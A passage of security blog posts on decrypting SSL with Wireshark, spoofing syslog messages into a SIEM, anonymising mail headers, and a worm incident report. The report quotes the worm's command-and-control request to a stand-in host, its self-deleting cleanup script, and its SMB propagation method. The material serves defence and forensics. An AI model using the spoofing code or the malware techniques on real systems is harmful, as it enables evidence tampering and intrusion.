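            and p[Ether].src.lower() == ROUTER_MAC
            and p[Ether].dst.lower() == WORKSTATION_MAC]

wrpcap("rite_exported_only.pcap", exported)
print(len(exported), "exported packets written")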

In the next exciting installment, the Cisco Kid will look at ways of extracting network session information from IOS routers, PIXes and ASAs.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

Decrypting SSL traffic with Wireshark, and ways to prevent it

Posted in Crypto, General Security on 20 July, 2010 by Alec Waters

A neat feature of Wireshark is the ability to decrypt SSL traffic. This post is about why you might want to do it, how to do it, why it works, and how to decrease the chances of other people being able to decrypt your “secure” traffic.

Why decrypt SSL?

Aside from the obvious malicious uses, decrypting SSL has uses such as:

  • Debugging applications that run over SSL (HTTP, SMTP, POP3, IMAP, FTP, etc).
  • Feeding a decrypted traffic stream to an IDS. Having the best signatures in the world won’t help if all your sensors see is encrypted traffic.
  • Learning about SSL. What better way to understand something than to take it apart and put it back together again?

How to decrypt SSL with Wireshark

Step one – set up an SSL-protected server to use as a testbed

To illustrate the process, we’re going to use OpenSSL to generate a certificate and act as a web server running HTTP over SSL (aka HTTPS) – it’s quite straightforward.

To begin with, we need to get ourselves a self-signed certificate that our HTTPS server can use. We can do this with a single command:

openssl req -x509 -nodes -newkey rsa:1024 -keyout testkey.pem -out testcert.pem

OpenSSL will ask you for some input to populate your certificate with; once you’ve answered all the questions, the output of this command is two files, testkey.pem (containing a 1024 bit RSA private key) and testcert.pem (containing a self signed certificate). PEM (Privacy Enhanced Mail) format files are plaintext, and consist of a BASE64 encoded body with header and footer lines. You can look at the contents of your key and certificate files in more detail like this:

openssl rsa -in testkey.pem -text -noout (output here)
openssl x509 -in testcert.pem -text -noout (output here; more info here)

We need to perform one tiny tweak to the format of the private key file (Wireshark will use this later on, and it won’t work properly until we’ve done this):

openssl rsa -in testkey.pem -out testkey.pem

Now we’re ready to fire up our HTTPS server:

openssl s_server -key testkey.pem -cert testcert.pem -WWW -cipher RC4-SHA -accept 443

The -key and -cert parameters to the s_server command reference the files we’ve just created, and the -WWW parameter (this one is case sensitive) causes OpenSSL to act like a simple web server capable of retrieving files in the current directory (I created a simple test file called myfile.html for the purposes of the test).

The -cipher parameter tells the server to use a particular cipher suite – I’m using RC4-SHA because that’s what’s used when you go to https://www.google.com. The RC4-SHA cipher suite will use RSA keys for authentication and key exchange, 128-bit RC4 for encryption, and SHA1 for hashing.

Having got our server up and running, we can point a browser at https://myserver/myfile.html and retrieve our test file via SSL (you can ignore any warnings about the validity of the certificate). If you’ve got this working, we can move on to…

Step two – capture some traffic with Wireshark

Fire up Wireshark on the server machine, ideally with a capture filter like “tcp port 443” so that we don’t capture any unnecessary traffic. Once we’re capturing, point your browser (running on a different machine) at https://myserver/myfile.html and stop the capture once it’s complete.

Right-click on any of the captured frames and select “Follow TCP stream” – a window will pop up that’s largely full of SSL-protected gobbledegook:

Step three – configuring Wireshark for decryption

Close the TCP Stream window and select Preferences from Wireshark’s Edit menu. Expand the “Protocols” node in the tree on the left and scroll down to SSL (in newer versions of Wireshark, you can open the node and type SSL and it will take you there).

Once SSL is selected, there’s an option on the right to enter an “RSA keys list”. Enter something like this:

10.16.8.5,443,http,c:\openssl-win32\bin\testkey.pem

You’ll need to edit the server IP address and path to testkey.pem as appropriate. If this has worked, we’ll notice two things:

  • Wireshark’s SSL dissector can look into otherwise encrypted SSL packets and dissect the protocol inside:
  • We can right-click on any of the captured frames that are listed as SSL or TLS and select “Follow SSL stream”:

Nice :)

You can read about this step in the Wireshark Wiki here.

Why it works

So, why does this work? Our test server, in common with a very large proportion of HTTP-over-SSL webservers, is using RSA to exchange the symmetric session key that will be used by the encryption algorithm (RC4 in this case). Below is an extract from RFC2246:

F.1.1.2. RSA key exchange and authentication

With RSA, key exchange and server authentication are combined. The public key may be either contained in the server’s certificate or may be a temporary RSA key sent in a server key exchange message.

After verifying the server’s certificate, the client encrypts a pre_master_secret with the server’s public key.

The server can of course decrypt the pre_master_secret passed to it by the client (by using the server’s private key in testkey.pem), and subsequently both the client and the server derive the master_secret from it – this is the symmetric key that both parties will use with RC4 to encrypt the session.

But the server isn’t the only one with the private key that corresponds to the public key in the server’s certificate – Wireshark has it as well. This means it is able to decrypt the pre_master_secret on its way from the client to the server, and thereafter derive the master_secret needed to decrypt the traffic.

How to prevent decryption

There are at least two methods to approach this:

Method one – Protect the server’s private key

Protection of one’s private key is at the core of any system using asymmetric keys. If your private key is compromised, the attacker can either masquerade as you or they can attempt to carry out decryption as outlined above. Keys stored in separate files like the ones above are particularly vulnerable to theft if access permissions are not set strictly enough, or if some other vulnerability allows access. Certain operating systems like Windows and Cisco’s IOS will try to protect the keys on your behalf by marking them as “non-exportable”. This is meant to mean that the OS won’t divulge the private key to anyone under any circumstances, but clearly there comes a point where some software running on the box has to access the key in order to use it. This simple fact can sometimes be exploited to export non-exportable keys – a practical attack is described in a past edition of Hakin9 magazine. You can download it for free; here’s a quote from the article:

The Operating System (Windows XP in this case) does not let you export the private key of a certificate if it is marked as non-exportable. However, the OS must have access to read the private key in order to use it for signing and encrypting. If the OS can access the private key and we control the OS, then we can also access the private key.

Method two – Don’t use RSA for key exchange

As we’ve seen, the RSA key exchange is susceptible to interception if one is fortunate enough to have the server’s private key. By using a flavour of Diffie-Hellman for key exchange instead, we can rule out any chance of an attacker feasibly decrypting our SSL traffic even if they are in possession of the server’s private key. With your existing server certificates and keys, run the server like this and get your browser to fetch https://myserver/myfile.html again:

openssl s_server -key testkey.pem -cert testcert.pem -WWW -cipher AES256-SHA -accept 443

We’ve changed the cipher from RC4 to 256 bit AES – this step is just to prove that Wireshark can decrypt AES as well as RC4.

Now, to break the decryption, alter the cipher suite to use Diffie-Hellman instead of RSA for key exchange:

openssl s_server -key testkey.pem -cert testcert.pem -WWW -cipher DHE-RSA-AES256-SHA -accept 443

If you’re using a browser other than IE (my IE8 doesn’t seem to support DH with RSA certificates), Wireshark is totally unable to decrypt the HTTP traffic, even though it is in possession of the server’s private key.
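If you want to confirm from the client side exactly which cipher suite was negotiated (and hence whether Diffie-Hellman is actually in play), a short Python check will tell you; the host name is an assumption, and certificate verification is switched off purely because our test certificate is self-signed:

# Hedged sketch: report the cipher suite negotiated with the test server.
import socket
import ssl

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE   # self-signed test cert only!

with socket.create_connection(("myserver", 443)) as sock:
    with ctx.wrap_socket(sock, server_hostname="myserver") as tls:
        name, version, bits = tls.cipher()
        print(f"Negotiated {name} ({version}, {bits} bits)")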

A DH key exchange is by design resistant to eavesdropping, although can be susceptible to a man-in-the-middle attack unless both parties identify themselves with certificates. It’s also, as we’ve seen, not universally supported by common SSL clients. But at least it rules out the possibility of some wiseguy with Wireshark sticking his fins where they’re not wanted!

Automatic inline SSL decryption

I have made some improvements to the viewssld package, which allows inline SSL decryption on your Snort/Sguil/etc boxes. You can read all about it here.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Si(EM)lent Witness

Posted in General Security, Why watch the wire? on 23 June, 2010 by Alec Waters

Obligatory disclaimer: I Am Not A Lawyer. “Evidentiary weight” is probably something that involves a set of scales.

Evidence of an electronic crime is most commonly retrieved through a well-established process of computer forensics. Regardless of the actual examination techniques used, the evidence (a seized hard drive, for example) has to be handled in such a way that its integrity is preserved, usually by way of examining a forensic duplicate of the media and leaving the original in the evidence safe.

It’s a little different when practicing network forensics:

  • You have to be routinely collecting the evidence before the mischief is perpetrated. Network-based evidence is fleeting in nature – once it’s gone, it’s gone – if you’re not recording something all the time, when the mischief happens you’ll miss it.
  • There isn’t such a firm concept of “original” or “best” evidence as there is in the computer forensics world. Packet captures are a copy of the original traffic, collected syslog messages are copies of log messages from a device, and netflow exports are descriptions of an act rather than the act itself. None of the copies are “forensically sound” like a disk image can be considered to be; they all sound rather like second-hand accounts.

A handy thing to do with all this evidence is to collect it, usually with some kind of SIEM or Log Management device, and vendors of such devices go to lengths to preserve the integrity of the collected data to maximise its weight as evidence. For example, a Cisco CS-MARS box stores everything in an internal Oracle database to which the user has no direct access; the idea is to give some assurance that the collected logs haven’t been tampered with. Other vendors like AlienVault say that their product “Forensically store(s) data (admissible in court)”. Given the potentially second-hand nature of our evidence, these anti-tamper measures are surely a good thing.

However, how can we convince someone that the evidence we are presenting is a true and accurate account of a given event, especially in the case where there is little or no evidence from other sources? Perhaps a laptop’s hard drive has been shredded, and the only evidence we’ve got is from our SIEM/LM box. Our evidence may be considered unreliable, since:

  • It could be incomplete:
    • A packet capture may not have captured everything – dropped packets are commonplace.
    • UDP-based message transfer (syslog, netflow, SNMP trap, etc.) is best-effort delivery. Dropped messages will not be retransmitted, and most likely a gap in the sequence will not even be noticed.
    • We may have exceeded our SIEM’s events per second threshold, and the box itself may have discarded crucial evidence.
  • The body of evidence within our SIEM could have been tampered with.

But didn’t I say that vendors went to great lengths to prevent tampering? They do, but these measures only protect information that is already on the device. What if I can contaminate the evidence before it’s under the SIEM’s protection?

The bulk of the information received by an SIEM box comes over UDP, so it’s reasonably easy to spoof a sender’s IP address; this is usually the sole means at the SIEM’s disposal to determine the origin of the message. Also, the messages themselves (syslog, SNMP trap, netflow, etc.) have very little provenance – there’s little or no sender authentication or integrity checking.

Both of these mean it’s comparatively straightforward for an attacker to send, for example, a syslog message that appears to have come from a legitimate server when it’s actually come from somewhere else.
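To illustrate just how little provenance a UDP syslog message carries, here’s a scapy sketch of a datagram with a forged source address – strictly for use against your own lab kit, and the addresses and message text are placeholders:

# Hedged sketch: a syslog message with a forged source address, lab use only.
# Nothing in the datagram proves it really came from 192.0.2.10.
from scapy.all import IP, UDP, Raw, send   # needs root/admin to send raw packets

FAKE_SOURCE = "192.0.2.10"   # the server we want to impersonate (placeholder)
SIEM = "192.0.2.200"         # the collector (placeholder)

msg = "<86>Jun 23 10:15:00 legit-server sshd[1234]: Accepted password for admin"
send(IP(src=FAKE_SOURCE, dst=SIEM) / UDP(sport=514, dport=514) / Raw(load=msg))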

In short, we can’t be certain where the messages came from or that their content is genuine.

So what could an attacker achieve by injecting false messages into an SIEM?

  • They could plant false evidence of an act that did not take place. Perhaps we want to get someone fired for downloading questionable materials, for example.
  • They could plant “tasty” evidence that the SIEM operators are likely to investigate first, buying the attacker time.
  • They could force the box over its EPS limit so that genuine evidence is discarded.
  • They could inject malformed messages that may lead the SIEM operators to believe that their box is somehow corrupted, and wait until it is offline for maintenance before striking.
  • They could inject events or series of events that “couldn’t happen” to cause the SIEM operators to distrust the accuracy of the system (e.g. a proxy log message indicating a fetch of a webpage with no corresponding netflow export).
  • Or perhaps their aim is to simply discredit the entire pool of evidence by injecting obviously false messages. Yes, an analyst could try to weed out the fake ones, but could they prove that they’d found all of them?
  • <insert your own creative evil here>

If there’s any doubt as to the provenance of a message received by the SIEM, one could always go back to the original source and look for it there. The problem here is that it might not be there any more (due to log rotation on a server) or there may not even be an original to compare it to (a netflow export is the original message, for example).

I’m surely being a bit pessimistic here, but given that there’s a distinct possibility that any given SIEM is chock full of lies, how much evidentiary weight does its content actually possess? Does anyone know of any successfully-prosecuted cases where evidence from an SIEM has been key?


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

hMailServer script to anonymise internal IP addresses

Posted in General Security, Information Leaks on 8 June, 2010 by Alec Waters

We all know that (accidentally) exposing private information to all and sundry is a bad thing; information leaked in SMTP Received: headers is a goldmine for pentesters and blackhats alike. Here’s a little script for hMailServer which will anonymise the names and IP addresses of internal SMTP mail clients that would otherwise be placed into a Received: header.

The script might need some tweaking to suit your environment:

  • It will anonymise Received: headers only when the connecting client’s IP address starts with 172.16. Alter this check to suit your own environment
  • You’ll need to change mail.example.com to whatever hMailServer’s Local host name is set to (under Settings->Protocols->SMTP->Delivery of e-mail)

hMailServer scripts are by default written in VBScript; I’ve had extensive counselling to get over the experience, and I’m fine now.

Tweak the script below, then add it to EventHandlers.vbs. Take care if you already have a handler defined for OnAcceptMessage:

' Strips out private IP addresses from the Received: header
' if the client's IP address is in 172.16.0.0/16

Sub OnAcceptMessage(oClient, oMessage)

    ' Check the client's IP address - we only want to do this work
    ' for internal clients
    If Left(oClient.IPAddress, 7) = "172.16." Then

        Dim oHeaders
        Set oHeaders = oMessage.Headers

        ' Iterate over the headers looking for Received:
        Dim i
        For i = oHeaders.Count - 1 To 0 Step -1

            Dim oHeader
            Set oHeader = oHeaders.Item(i)

            ' Check if this is a header which we should modify.
            If LCase(oHeader.Name) = "received" Then

                ' Log the header value in case we need it later on
                EventLog.Write("Pre-anonymisation: " + oHeader.Value)

                ' Set up the regex
                Dim myRegExp
                Set myRegExp = New RegExp
                myRegExp.Global = False
                myRegExp.Pattern = "\bfrom[\-\sA-Za-z0-9\.\]\[\(\)]*by mail.example.com\b"

                ' Do the replacement
                oHeader.Value = myRegExp.Replace(oHeader.Value, "from mailclient by mail.example.com")

                ' Dump the modified header
                EventLog.Write("Post-anonymisation: " + oHeader.Value)

            End If

        Next

        ' Save all the changes...
        oMessage.Save

    End If

End Sub

The before-and-after Received: headers look like this:

Received: from some-machine ([172.16.28.16]) by mail.example.com ; Tue, 8 Jun 2010 11:49:22 +0100
Received: from mailclient by mail.example.com ; Tue, 8 Jun 2010 11:49:22 +0100

…thereby neatly hiding the fact that there is an internal machine called some-machine at IP address 172.16.28.16. The original header is logged to hMailServer’s EventLog file in case it’s needed later on for debugging, or during Incident Response or other forensic activity.

You can download the script here – I hope someone finds it useful!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Private Investigations

Posted in Case Studies, General Security, Malware, NSM, Why watch the wire? on 25 May, 2010 by Alec Waters

The following is a sanitised excerpt from an after action report on a malware infection. Like the song this post is named after, the report goes all the way from “It’s a mystery to me” to “What have you got to take away?”. The report is in two parts:

  • Firstly, a timeline of events that was constructed from the various forms of log and network flow data that are routinely collected. Although not explicitly cited in this report, evidence exists to back up all of the items in the timeline
  • The second part is an analysis of the cause of all the mischief

To set the scene, the mystery to be unraveled concerned two machines on an enterprise network which reported that they had detected and removed malware. Detected and removed? Case closed, surely? Never ones to let a malware detection go uninvestigated, we dig deeper…

Part One – Timeline of events

Unknown time, likely shortly before 08:12:37 BST
Ian Oswald attaches a USB stick to his computer. $AV_VENDOR does nothing, either because it detects no threat or because it isn’t working properly. The last message from $AV_VENDOR on Ian’s machine to $AV_MANAGEMENT_SERVER was on 30th January 2009, suggesting the latter is the case.

Based upon subsequent activity, malware is active on Ian’s machine at this point, and is running under his Windows account as a Domain Administrator. The potential for mischief is therefore largely unconstrained.

08:12:37 BST
Ian’s machine ($ATTACKER) requests the URL:

http://www.whatismyip.com/automation/n09230945.asp

This returns a page containing the outside global IP address of Ian’s machine (i.e., the IP address it will appear to have when communicating with hosts on the Internet).

Something on Ian’s machine now knows “where it is” on the Internet.

It is likely that the inside local IP address of Ian’s machine (192.168.1.11) is also determined at this point, so something on Ian’s machine also knows “where it is” within the enterprise.

08:12:39 BST
Ian’s machine requests the URL:

http://geoloc.daiguo.com/?self

This is a geolocation site, and returns a string containing a country code.

Something on Ian’s machine now knows “where it is” geographically.

08:12:56 BST
Ian’s machine attempts to download a hostile executable. This download is blocked by $URLFILTER, which is fortunate because at the time the executable was not detected as a threat by $AV_VENDOR.

NOTE – Subsequent analysis of the executable confirms its hostile nature; detailed discussion is out of the scope of this report, but a command and control channel was observed, and steganographic techniques were used to conceal the download of further malware by hiding an obfuscated executable in the Comments extension header of a gif file.

NOTE – It was not known until later in the investigation if Ian’s machine already knew where to download the executable from, or if a command and control channel was involved. Ian’s machine was running Skype at the time, which produces sufficient network noise to occlude such a channel when only network session information is available to the investigator.

After this attempted download, Ian’s machine starts trying to contact TCP ports 139 and 445 on IP addresses that are based on the determined outside global address of Ian’s machine (xxx.yyy.49.253).

TCP139 and TCP445 are used by the SMB protocol (Windows file sharing).

The scan starts with IP address xxx.yyy.49.1, and increments sequentially. As the day progresses, the scan of xxx.yyy.49.aaa finishes, and continues to scan xxx.yyy.50.aaa and xxx.yyy.51.aaa.

This is the behaviour of a worm. Something on Ian’s machine is trying to propagate to other machines nearby.

08:13:14 BST
Ian notices a process called ip.exe running in a command prompt window on his computer and he physically disconnects it from the network. This action was taken a very creditable 41 seconds after the first suspicious network activity.

Ian attempts to stop ip.exe running and remove it from his machine, and also deletes a file called gxcinr.exe from his USB stick.

08:24:51 BST
Ian reattaches his machine to the network.

08:25:36 BST
Ian uses Google to research ip.exe, and reads a blog posting which talks about its removal. Ian considers his machine clean at this point since the most obvious indicator (ip.exe) is no longer present.

08:57:32 BST
The external sequential SMB scanning observed before the attempted cleanup restarts at xxx.yyy.49.1.

Additionally, an internal scan commences at this point of the 192.168.1.aaa subnet (i.e., the enterprise’s internal network).

As the day progresses, the scan covers 192.168.2.aaa, 192.168.3.aaa, 192.168.4.aaa, 192.168.5.aaa, 192.168.6.aaa, 192.168.7.aaa and 192.168.8.aaa before Ian’s machine is switched off for the day. These latter subnets are not in use, so no connections were made to target systems.

The scan of 192.168.1.aaa is bound to bear fruit. Within this range, any detected SMB shares on enterprise computers will be accessed with the rights of a Domain Administrator.

08:58:43 BST
$AV_VENDOR detects and quarantines a threat named “W32/Autorun.worm.zf.gen” on $VICTIM_WORKSTATION_1 (Annie Timms’ machine). The threat was in a file called gxcinr.exe, which was in C:\Users\ on Annie’s machine. $AV_VENDOR cites $ATTACKER (Ian’s machine) as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

09:00:08 BST
$AV_VENDOR detects and quarantines the same threat in the same file in the same location on $VICTIM_WORKSTATION_2. Linda Charles was determined to be the logged on user at the time, and again Ian’s machine was cited as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

09:34:45 BST
$AV_VENDOR on $VICTIM_SERVER_1 detects the same threat in the same file, but in a different directory (C:\Program Files\Some software v1.1\). The threat was quarantined. No threat source was noted, although a successful type 3 (network) login from Ian.Oswald was noted immediately prior to the detection, making Ian’s machine the likely attacker. Unfortunately, the detection was _not_ propagated to $AV_MANAGEMENT_SERVER, and therefore did not find its way to the $SIEM to be sent as an email.

09:37:51 BST
The same threat was detected and quarantined on $VICTIM_SERVER_2, this time in E:\Testbeds\TestOne\. Again, a type 3 login from Ian.Oswald precedes the detection, which again was not propagated to $AV_MANAGEMENT_SERVER, $SIEM or email.

09:40:00 BST
The same threat appears on $VICTIM_SERVER_3, in C:\Program Files\SomeOtherSoftware. $AV_VENDOR does not detect the threat because the product isn’t fully installed on this machine.

NOTE – Detection of gxcinr.exe on this machine was by manual means, after the malware’s propagation mechanism was deduced (see next entry). $AV_VENDOR was subsequently installed on $VICTIM_SERVER_3 and a full scan performed. For what it’s worth, this did not detect any threats.

09:46:05 BST -> 09:54:44 BST
The border $IPS sensor detected Ian’s machine connecting to and enumerating SMB shares on three machines on $ISP’s network (i.e., other $ISP customers external to the enterprise).

This clue helps us see how the malware is spreading, and why the threats were detected in the cited directories.

The malware conducts a sequential scan of IP addresses, looking for open SMB ports. If it finds one, it enumerates the shares present, picks the first one only, and copies the threat (gxcinr.exe) to that location (i.e., \\VICTIMMACHINE\FirstShare\gxcinr.exe):

  • C:\Program Files\Some software v1.1\ equates to the first share on $VICTIM_SERVER_1 – \\$VICTIM_SERVER_1\Software
  • E:\Testbeds\TestOne\ equates to the first share on $VICTIM_SERVER_2 – \\$VICTIM_SERVER_2\TestOne
  • C:\Users equates to the first share on Annie’s and Linda’s machine – \\$VICTIM_WORKSTATION_1\Users and \\$VICTIM_WORKSTATION_2\Users
  • C:\Program Files\SomeOtherSoftware equates to the first share on $VICTIM_SERVER_3 – \\$VICTIM_SERVER_3\SomeOtherSoftware

This knowledge allows us to manually check other machines on the enterprise network by performing the same steps as the malware. Other machines and devices were found to have open file shares, but either the shares were not writeable from a Domain Administrator’s account, or there was no trace of the threat (gxcinr.exe).
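For reference, the manual check amounted to something like the sketch below (Python, run from a Windows machine with suitable rights; the parsing of ‘net view’ output is approximate and assumes an English-locale system):

    import os
    import subprocess

    def first_share(host):
        # Enumerate shares the same way the malware does and return the first one.
        out = subprocess.run(["net", "view", f"\\\\{host}"],
                             capture_output=True, text=True).stdout
        in_table = False
        for line in out.splitlines():
            if line.startswith("---"):
                in_table = True
                continue
            if in_table and line.strip() and not line.startswith("The command"):
                return line.split()[0]
        return None

    for host in (f"192.168.1.{n}" for n in range(1, 255)):
        share = first_share(host)
        if share and os.path.exists(rf"\\{host}\{share}\gxcinr.exe"):
            print(f"possible infection: \\\\{host}\\{share}")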

Circa 14:00 BST
Ian turns his machine off and leaves the office until the following Monday.

The following Monday
Ian returns to the office and wipes his machine, installing Windows 7 in place of the previous Windows Vista. “Patient Zero” is therefore gone forever, and any understanding we could have extracted from it is lost.

END OF TIMELINE

Part Two – Analysis of gxcinr.exe

It is necessary to understand what this file is, what it does, and how it persists in order to know if we have eradicated the threat. We also need to understand if gxcinr.exe was responsible for the propagation from Ian’s machine, or if it was just the payload.

Samples of gxcinr.exe were available in five places, namely the unprotected $VICTIM_SERVER_3 server and in the quarantine folders of the four machines where $AV_VENDOR detected the threat. We reverse-engineered the quarantine file format used by $AV_VENDOR and extracted the quarantined threats for comparison.
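The reverse engineering itself is out of scope here, and quarantine formats differ from product to product. Purely as an illustration of the general approach: several products do little more than XOR the original file with a fixed single-byte key, which can be brute-forced by looking for the executable’s MZ header. The sketch below assumes exactly that (placeholder paths, and it assumes the payload sits at the very start of the quarantine file – real formats usually prepend metadata):

    from pathlib import Path

    def try_single_byte_xor(blob):
        # Brute-force a one-byte XOR key by looking for the 'MZ' executable header.
        for key in range(1, 256):
            candidate = bytes(b ^ key for b in blob)
            if candidate.startswith(b"MZ"):
                return key, candidate
        return None, None

    blob = Path("quarantine/sample.qua").read_bytes()   # placeholder path
    key, recovered = try_single_byte_xor(blob)
    if recovered:
        Path("recovered_sample.bin").write_bytes(recovered)
        print(f"recovered with XOR key 0x{key:02x}")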

On the $VICTIM_SERVER_3 machine, the MAC times for gxcinr.exe were as follows:

Modified: aa/bb/2009 09:13
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
No file attributes were set.

Additionally, a zero-byte file called khw was found alongside gxcinr.exe. Its MAC times correlate with those of gxcinr.exe, indicating that it was either propagated along with gxcinr.exe or created by it:

Modified: xx/yy/2010 09:40
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
Attributes: RHSA

khw was also found on Linda Charles’s machine, and removed manually. No other machines had khw on them.

All five samples of gxcinr.exe were found to be identical:

File size: 808164 bytes

Hashes:
MD5 : 2511bcae3bf729d2417635cb384e3c08
SHA1 : 45fe02e4489110723c2787f3975ae7122b905400
SHA256: b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3
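Confirming that the recovered copies are one and the same is a straightforward hashing exercise, along these lines (the directory name is a placeholder for wherever the five recovered copies were staged):

    import hashlib
    from pathlib import Path

    digests = set()
    for sample in Path("recovered_samples").iterdir():
        data = sample.read_bytes()
        digests.add((len(data), hashlib.sha256(data).hexdigest()))

    print("all samples identical" if len(digests) == 1 else "samples differ")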

VirusTotal report is here:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1272966302

The AV detection rate is pretty good, although we were the first people to submit this specific malware sample to VirusTotal for analysis (i.e., it’s a reasonably fresh variant of a malware strain).

Whilst it’s not safe to judge the nature of malware by AV vendors’ descriptions alone, most of the descriptions have AutoIt in their names. AutoIt is a scripting tool that can be used to produce executables to carry out Windows tasks. Analysis of ASCII and Unicode strings contained in the sample lends weight to this theory.

AutoIt has an executable-to-script feature, but this was unable to extract the compiled script. Research suggests that this feature has been removed from recent versions of the software as a security precaution.

The sample contains the string below, amongst many other intelligible artefacts:

“This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.”

The address above was emailed asking for help, but no response was received.

The next step was to carry out dynamic analysis of the sample (i.e., the executable was run in an instrumented and controlled environment and the results observed).

When run, gxcinr.exe did very little. There was no geolocation, no IP address determination, no instance of ip.exe, no scanning, and no second-stage download.

However, three temporary files were discovered which gxcinr.exe created and later attempted to remove:

  1. aut1F.tmp (random filename, judging by repeated runs) is binary; its first four bytes are the ASCII string EA06 (http://www.virustotal.com/analisis/b3508b5a86ca4b9d972ce46dd4dcc1dcbe528a24190d2ed10a3cfcf8038c8ecd-1273577387). There is no obvious decode or deobfuscation.
  2. jbmphni (random filename, judging by repeated runs) is ASCII and starts off “3939i33t33i33t3135i33t…..”. There are many repeating patterns in the file, some of which are several tens of characters long (http://www.virustotal.com/analisis/0ad63912039550b5bdfd8a08ce5f49997ed1fced070df4d8e51cbffa500f102d-1273577394). Again, there is no obvious decode or deobfuscation.
  3. s.cmd is a cleanup script, run by gxcinr.exe after it itself has deleted the files above:

    :loop
    del "C:\gxcinr.exe"
    if exist "C:\gxcinr.exe" goto loop
    del c:\s.cmd

Running the sample in this manner yielded no obvious activity, infection, propagation or persistence.

However, if the file khw is present in the same directory as gxcinr.exe, different behaviour is observed. The three files above are extracted and the same cleanup takes place, but in addition:

  • A slightly modified version of the sample is copied to c:\windows\system32 as csrcs.exe. The name of the file is a deliberate attempt to hide in plain sight – there is a legitimate Windows file called csrss.exe. Additionally, the file’s creation and modification times are artificially set to match the date on which Windows was installed. VirusTotal says this of csrcs.exe:
    http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274359325
  • No attempt is made to hide csrcs.exe from detection, nor does it delete its prefetch file. No matching prefetch files were found on the machines belonging to Annie and Linda, so it is unlikely that the malware executed there. Prefetch is disabled by default on Windows Server 2003, so this kind of analysis cannot be performed on $VICTIM_SERVER_1, $VICTIM_SERVER_2, and $VICTIM_SERVER_3.
  • csrcs.exe is set to auto-run with each reboot by means of various registry keys (one way to audit the usual auto-run locations is sketched after this list).
  • csrcs.exe contacts a command and control server at IP address qqq.www.eee.rrr on varying ports in the 81-89 range. The request was HTTP, and looked like this:

    GET /xny.htm HTTP/1.1
    Host: http://www.hostile.com:85
    Cache-Control: no-cache

    The response is encoded somehow:

    HTTP/1.1 200 Ok
    Content-Length: 2811
    Last-modified: xxx, xx xxx 2010 11:13:30 GMT
    Content-Type: text/html
    Connection: Keep-Alive
    Server: SHS

    <zZ45sAsM8Y77V69S888S6 … snip … 80ew0kty0j4tyj004>

    There is no obvious decode of the response, but we are likely receiving instructions of some kind. Looking retrospectively at the evidence secured at the time, we can see Ian’s machine contacting this IP address:

    08:12:39.048 BST: %IPNAT-6-CREATED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    08:12:41 BST Cisco Netflow : bytes: 289 , packets: 5 , 192.168.1.11 /50345 -> qqq.www.eee.rrr /85 TCP

    08:13:39.393 BST: %IPNAT-6-DELETED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    This C&C channel was not readily obvious due to the presence of Skype on Ian’s machine – there were too many other connections to random IP addresses on random ports for this to stand out.

    Despite the fact this suspected C&C channel uses unencrypted HTTP, only nominated ports are inspected via $URLFILTER (port 80 is inspected as the default, plus other ports where we have seen HTTP running in the past). At the time, 85 was not one of the nominated ports so no inspection of this traffic was carried out. Had port 85 been in the list, $URLFILTER would have blocked the request, as the destination is categorised as Malicious. It is unknown if this step would have prevented the worm from spreading, but it would have at least been another definite indicator of malice.

  • csrcs.exe then gets its external IP address and geolocation in the manner observed from Ian’s machine
  • csrcs.exe then starts scanning in the manner observed from Ian’s machine
  • csrcs.exe infects other machines in the manner observed from Ian’s machine
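As flagged a couple of bullets up, the persistence and execution traces can be audited without knowing the malware’s exact registry keys. The sketch below (Python, run on the host being checked) simply sweeps the common Run keys for anything mentioning csrcs and lists any matching Prefetch entries:

    import glob
    import os
    import winreg

    RUN_KEYS = [
        (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"),
        (winreg.HKEY_CURRENT_USER,  r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"),
    ]

    for hive, path in RUN_KEYS:
        try:
            key = winreg.OpenKey(hive, path)
        except OSError:
            continue
        index = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, index)
            except OSError:
                break   # no more values under this key
            if "csrcs" in str(value).lower():
                print(f"suspicious auto-run entry: {name} = {value}")
            index += 1

    # Where Prefetch is enabled, a leftover .pf file betrays past execution.
    for pf in glob.glob(os.path.expandvars(r"%SystemRoot%\Prefetch\CSRCS.EXE-*.pf")):
        print("prefetch evidence of execution:", pf)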

In our tests, csrcs.exe created a file on each remote victim machine called owadzw.exe, and put the file khw alongside it (suggesting that gxcinr.exe is a randomly generated filename). We did not observe any attempt to execute owadzw.exe, nor were any registry keys modified. The malware appears to spread, but seems to rely on manual execution when the remote file share is on a fixed disk.

However, if the file share that is accessed is removable media (USB stick, camera, MP3 player or whatever), an autorun.inf file is created that will execute the malware when the stick is inserted in another computer. It is likely therefore that Ian’s USB stick was infected in this manner, and the malware was unleashed on the enterprise by virtue of him plugging it in.
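We did not keep the autorun.inf itself to reproduce here, but the mechanism is the standard one abused by USB-borne worms, and removable media can be swept for it cheaply. In the sketch below (Python) the example autorun.inf content in the comment is typical of this class of worm rather than the actual observed file, and the drive letter is a placeholder:

    import configparser
    import os

    # A typical hostile autorun.inf looks something like this (illustrative only):
    #   [autorun]
    #   open=owadzw.exe
    #   shellexecute=owadzw.exe

    def check_autorun(drive_root):
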